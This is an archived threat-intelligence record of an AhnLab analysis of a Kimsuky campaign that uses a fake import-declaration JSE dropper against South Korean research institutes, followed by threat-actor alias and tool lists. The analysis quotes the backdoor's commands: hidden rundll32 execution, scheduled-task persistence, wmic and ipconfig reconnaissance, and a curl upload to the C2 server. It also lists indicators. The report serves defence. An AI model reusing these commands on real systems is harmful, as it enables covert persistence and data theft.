{ "id": "ec043e92-0a7c-48a4-ba69-a0f177d5a7ca", "created_at": "2026-04-06T00:19:51.941591Z", "updated_at": "2026-04-10T03:37:41.034166Z", "deleted_at": null, "sha1_hash": "f81925c3c07bed117f722677f30006cc7cc29aec", "title": "Kimsuky Targets South Korean Research Institutes with Fake Import Declaration", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 3176395, "plain_text": "Kimsuky Targets South Korean Research Institutes with Fake\r\nImport Declaration\r\nBy ATCP\r\nPublished: 2023-11-20 · Archived: 2026-04-05 23:03:59 UTC\r\nAhnLab Security Emergency response Center (ASEC) has recently identified that the Kimsuky threat group is\r\ndistributing a malicious JSE file disguised as an import declaration to research institutes in South Korea. The\r\nthreat actor ultimately uses a backdoor to steal information and execute commands.\r\nThe file name of the dropper disguised as an import declaration is as follows.\r\nImport Declaration_Official Stamp Affixed.jse\r\nThe file contains an obfuscated PowerShell script, a Base64-encoded backdoor file, and a legitimate PDF file.\r\nhttps://asec.ahnlab.com/en/59387/\r\nPage 1 of 5\n\nA legitimate PDF file is saved under the file name ‘Import Declaration.PDF’ and automatically executed by the\r\nPowerShell script. This file contains the attack target’s information. Creating and executing a legitimate PDF file\r\nis likely done to prevent users from recognizing that a malicious backdoor file is being executed in the process.\r\nhttps://asec.ahnlab.com/en/59387/\r\nPage 2 of 5\n\nIn the background, a backdoor is created in the %ProgramData% path under the file name ‘vuVvMKg.i3IO’, and\r\nthe malware is run using rundll32.exe.\r\npowershell.exe -windowstyle hidden rundll32.exe ProgramData\\\\vuVuMKg.i3IO UpdateSystem\r\nThe malware copies itself into the %ProgramData% and %Public% paths under the file name ‘IconCache.db’ for\r\npersistence before registering itself to the task scheduler.\r\ncmd.exe /c schtasks /create /tn iconcache /tr “rundll32.exe C:\\Programdata\\IconCache.db UpdateSystem /sc\r\nonlogon /rl highest /f\r\nTo exfiltrate system information, the backdoor uses the wmic command to check the anti-malware status of the\r\nattack target and collects network information through the ipconfig command.\r\ncmd.exe /U /c wimc /namespace:\\\\root\\securitycenter2 path antivirusproduct get displayname \u003e vaccine.txt\r\nipconfig /all\r\nAfterwards, information such as the host name, user name, and OS information is collected. For the malware to\r\navoid detection, it encodes the command execution results and sends them to the C2.\r\nhttps://asec.ahnlab.com/en/59387/\r\nPage 3 of 5\n\nAlso, the following commands (including system information exfiltration) are run, behaving as a backdoor in the\r\naffected system. Additionally, the curl tool is used to upload information to the C2 server.\r\ngetinfo: System information\r\ndie: Terminate\r\nwhere: Execution path\r\nrun: Run certain files and commands\r\ncurl -k -F “fileToUpload=@%s” -F “id=%S” %s\r\nBecause the bait file is also run, users cannot recognize that their systems are infected by malware. As these types\r\nof malware mainly attack specific targets, users should refrain from running attachments in emails sent from\r\nunknown sources.\r\n[File Detection]\r\nDropper/JS.Generic (2023.11.16.02)\r\nBackdoor/Win.Nikidoor (2023.11.15.03)\r\nMD5\r\nd2335df6d17fc7c2a5d0583423e39ff8\r\nd6abeeb469e2417bbcd3c122c06ba099\r\nhttps://asec.ahnlab.com/en/59387/\r\nPage 4 of 5\n\nAdditional IOCs are available on AhnLab TIP.\r\nURL\r\nhttp[:]//rscnode[.]dothome[.]co[.]kr/index[.]php\r\nhttp[:]//rscnode[.]dothome[.]co[.]kr/upload[.]php\r\nAdditional IOCs are available on AhnLab TIP.\r\nGain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click\r\nthe banner below.\r\nSource: https://asec.ahnlab.com/en/59387/\r\nhttps://asec.ahnlab.com/en/59387/\r\nPage 5 of 5", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "references": [ "https://asec.ahnlab.com/en/59387/" ], "report_names": [ "59387" ], "threat_actors": [ { "id": "191d7f9a-8c3c-442a-9f13-debe259d4cc2", "created_at": "2022-10-25T15:50:23.280374Z", "updated_at": "2026-04-10T02:00:05.305572Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "Kimsuky", "Black Banshee", "Velvet Chollima", "Emerald Sleet", "THALLIUM", "APT43", "TA427", "Springtail" ], "source_name": "MITRE:Kimsuky", "tools": [ "Troll Stealer", "schtasks", "Amadey", "GoBear", "Brave Prince", "CSPY Downloader", "gh0st RAT", "AppleSeed", "Gomir", "NOKKI", "QuasarRAT", "Gold Dragon", "PsExec", "KGH_SPY", "Mimikatz", "BabyShark", "TRANSLATEXT" ], "source_id": "MITRE", "reports": null }, { "id": "760f2827-1718-4eed-8234-4027c1346145", "created_at": "2023-01-06T13:46:38.670947Z", "updated_at": "2026-04-10T02:00:03.062424Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "G0086", "Emerald Sleet", "THALLIUM", "Springtail", "Sparkling Pisces", "Thallium", "Operation Stolen Pencil", "APT43", "Velvet Chollima", "Black Banshee" ], "source_name": "MISPGALAXY:Kimsuky", "tools": [ "xrat", "QUASARRAT", "RDP Wrapper", "TightVNC", "BabyShark", "RevClient" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d", "created_at": "2025-08-07T02:03:25.101147Z", "updated_at": "2026-04-10T02:00:03.846812Z", "deleted_at": null, "main_name": "NICKEL KIMBALL", "aliases": [ "APT43 ", "ARCHIPELAGO ", "Black Banshee ", "Crooked Pisces ", "Emerald Sleet ", "ITG16 ", "Kimsuky ", "Larva-24005 ", "Opal Sleet ", "Ruby Sleet ", "SharpTongue ", "Sparking Pisces ", "Springtail ", "TA406 ", "TA427 ", "THALLIUM ", "UAT-5394 ", "Velvet Chollima " ], "source_name": "Secureworks:NICKEL KIMBALL", "tools": [ "BabyShark", "FastFire", "FastSpy", "FireViewer", "Konni" ], "source_id": "Secureworks", "reports": null }, { "id": "71a1e16c-3ba6-4193-be62-be53527817bc", "created_at": "2022-10-25T16:07:23.753455Z", "updated_at": "2026-04-10T02:00:04.73769Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "APT 43", "Black Banshee", "Emerald Sleet", "G0086", "G0094", "ITG16", "KTA082", "Kimsuky", "Larva-24005", "Larva-25004", "Operation Baby Coin", "Operation Covert Stalker", "Operation DEEP#DRIVE", "Operation DEEP#GOSU", "Operation Kabar Cobra", "Operation Mystery Baby", "Operation Red Salt", "Operation Smoke Screen", "Operation Stealth Power", "Operation Stolen Pencil", "SharpTongue", "Sparkling Pisces", "Springtail", "TA406", "TA427", "Thallium", "UAT-5394", "Velvet Chollima" ], "source_name": "ETDA:Kimsuky", "tools": [ "AngryRebel", "AppleSeed", "BITTERSWEET", "BabyShark", "BoBoStealer", "CSPY Downloader", "Farfli", "FlowerPower", "Gh0st RAT", "Ghost RAT", "Gold Dragon", "GoldDragon", "GoldStamp", "JamBog", "KGH Spyware Suite", "KGH_SPY", "KPortScan", "KimJongRAT", "Kimsuky", "LATEOP", "LOLBAS", "LOLBins", "Living off the Land", "Lovexxx", "MailPassView", "Mechanical", "Mimikatz", "MoonPeak", "Moudour", "MyDogs", "Mydoor", "Network Password Recovery", "PCRat", "ProcDump", "PsExec", "ReconShark", "Remote Desktop PassView", "SHARPEXT", "SWEETDROP", "SmallTiger", "SniffPass", "TODDLERSHARK", "TRANSLATEXT", "Troll Stealer", "TrollAgent", "VENOMBITE", "WebBrowserPassView", "xRAT" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434791, "ts_updated_at": 1775792261, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/f81925c3c07bed117f722677f30006cc7cc29aec.pdf", "text": "https://archive.orkl.eu/f81925c3c07bed117f722677f30006cc7cc29aec.txt", "img": "https://archive.orkl.eu/f81925c3c07bed117f722677f30006cc7cc29aec.jpg" } }